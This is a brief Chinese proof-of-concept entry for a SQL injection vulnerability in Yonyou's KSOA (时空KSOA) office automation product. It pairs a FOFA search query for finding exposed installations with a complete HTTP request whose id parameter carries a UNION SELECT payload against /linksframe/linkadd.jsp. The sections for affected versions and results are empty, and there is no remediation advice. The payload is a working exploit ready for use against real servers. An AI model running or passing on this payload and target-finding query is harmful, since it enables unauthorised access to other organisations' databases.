Y22-3用友-时空KSOA-SQL

漏洞描述：

用友时空OA（OfficeAnywhere）是用友软件推出的办公自动化产品，支持移动办公，提供强大的工作流引擎、协同办公工具、信息管理、日程和会议管理等功能，旨在帮助企业提高工作效率、促进团队合作，同时注重数据安全和权限管理。产品特性可能会因版本和更新而有所变化，建议查阅用友官方网站获取最新信息

影响版本：

网站图片:

网络测绘:

fofa语法：

FOFA: app=“用友-时空KSOA”

漏洞复现:

payload：

GET /linksframe/linkadd.jsp?id=-2125%27%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://fofa.info/
Connection: close
Cookie: 
Upgrade-Insecure-Requests: 1

效果图: